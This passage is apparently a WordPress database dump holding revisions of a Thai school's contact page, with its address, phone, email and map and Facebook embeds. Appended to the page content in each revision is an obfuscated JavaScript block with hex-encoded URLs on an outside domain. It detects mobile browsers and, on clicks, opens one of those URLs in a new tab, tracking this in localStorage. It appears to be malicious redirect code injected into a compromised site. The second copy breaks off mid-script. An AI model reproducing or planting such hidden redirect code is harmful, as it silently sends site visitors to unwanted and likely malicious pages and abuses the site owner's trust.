has-background wp-element-button\" style=\"border-radius:13px\"><strong>ติดตามเราได้ที่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"72b5dc91\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f570a6dd\",\"isGrid\":true,\"gridId\":\"72b5dc91\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"e888c6d0\",\"isGrid\":true,\"gridId\":\"72b5dc91\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-06 21:56:42','2024-08-06 14:56:42','',362,'http://pakhaeng.ssk.in.th/?p=578',0,'revision','',0),
(580,1,'2024-08-06 21:58:52','2024-08-06 14:58:52','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>แผนที่ตั้ง</strong></a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>ติดตามเราได้ที่</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"72b5dc91\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f570a6dd\",\"isGrid\":true,\"gridId\":\"72b5dc91\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"e888c6d0\",\"isGrid\":true,\"gridId\":\"72b5dc91\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 